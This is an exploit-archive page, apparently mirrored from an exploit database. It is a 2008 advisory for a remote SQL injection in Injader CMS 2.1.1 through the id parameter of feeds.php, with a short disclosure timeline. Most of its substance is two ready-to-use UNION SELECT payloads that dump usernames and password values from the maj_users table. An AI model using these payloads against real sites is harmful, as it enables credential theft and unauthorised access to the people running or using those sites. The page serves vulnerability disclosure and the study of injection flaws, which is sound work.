[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Injader CMS 2.1.1 (id) Remote SQL Injection Vulnerability
# Published : 2008-12-18
# Author : fuzion
# Previous Title : Phpclanwebsite <= 1.23.3 Fix Pack #5 Multiple Remote Vulnerabilities
# Next Title : Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability


Injader CMS
http://www.injader.com/



- (= 2.1.1 -

- SQL -
http://localhost/upload/feeds.php?name=articles&id=<SQL>
magic_quotes_gpc = Off
register_globals = On


Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758



- Timeline -
Author notified: Nov 30, Dec 09,10
Injader 2.1.2: Dec 12
Public disclosure: Dec 18


- Seasons Greetings -
- http://nukeit.org -

# www.Syue.com [2008-12-18]